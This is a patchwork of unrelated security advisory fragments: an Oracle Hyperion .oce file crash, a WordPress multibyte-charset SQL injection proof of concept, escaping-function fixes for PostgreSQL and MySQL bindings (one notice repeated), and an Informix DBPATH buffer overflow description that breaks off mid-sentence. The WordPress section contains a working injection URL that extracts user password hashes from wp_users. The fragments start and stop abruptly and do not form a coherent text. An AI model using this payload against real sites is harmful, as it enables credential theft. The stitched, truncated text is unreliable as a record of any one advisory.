which is delivered with Oracle Hyperion Suite.
When clicked a login box appears, on clicking OK an error message
also appears then error then... boom!
description for .oce :
Interactive Reporting database connection file
file association:
"C:\Oracle\Middleware3\EPMSystem11R1\products\biplus\\bin\\brioqry.exe" "%1"
crash dump, eip and seh overwritten, unicode expanded,
3. Proof of concept
a. After WordPress installation, modify wp-config.php to make sure
it uses certain character set for database connection (Big5 can also be used):
define('DB_CHARSET', 'GBK');
b. http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
It was discovered that postgresql-ocaml, OCaml bindings to PostgreSQL's
libpq, was missing a function to call PQescapeStringConn(). This is
needed, because PQescapeStringConn() honours the charset of the
connection and prevents insufficient escaping, when certain multibyte
character encodings are used. The added function is called
escape_string_conn() and takes the established database connection as a
first argument. The old escape_string() was kept for backwards
compatibility.
Developers using these bindings are encouraged to adjust their code to
use the new function.
It was discovered that mysql-ocaml, OCaml bindings for MySql,
was missing a function to call mysql_real_escape_string(). This
is needed, because mysql_real_escape_string() honours the charset
of the connection and prevents insufficient escaping, when certain
multibyte character encodings are used. The added function is called
real_escape() and takes the established database connection as a first
argument. The old escape_string() was kept for backwards compatibility
(CVE-2009-2942).
This update fixes this vulnerability.
_______________________________________________________________________
It was discovered that pygresql, a PostgreSQL module for Python, was
missing a function to call PQescapeStringConn(). This is needed, because
PQescapeStringConn() honours the charset of the connection and prevents
insufficient escaping, when certain multibyte character encodings are
used. The new function is called pg_escape_string(), which takes the
database connection as a first argument. The old function
escape_string() has been preserved as well for backwards compatibility.
Developers using these bindings are encouraged to adjust their code to
use the new function.
It was discovered that mysql-ocaml, OCaml bindings for MySql, was
missing a function to call mysql_real_escape_string(). This is needed,
because mysql_real_escape_string() honours the charset of the connection
and prevents insufficient escaping, when certain multibyte character
encodings are used. The added function is called real_escape() and
takes the established database connection as a first argument. The old
escape_string() was kept for backwards compatibility.
Developers using these bindings are encouraged to adjust their code to
use the new function.
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
systems with vulnerable installations of IBM's Informix Dynamic Server.
User interaction is not required to exploit this vulnerability.
Authentication is required in that an attacker must have database
connection priviliges.
The specific flaw exists in the oninit.exe process that listens by
default on TCP port 1526. During authentication, the process does not
validate the length of the DBPATH variable. An attacker can provide a
overly long variable name and overflow a global buffer, overwriting
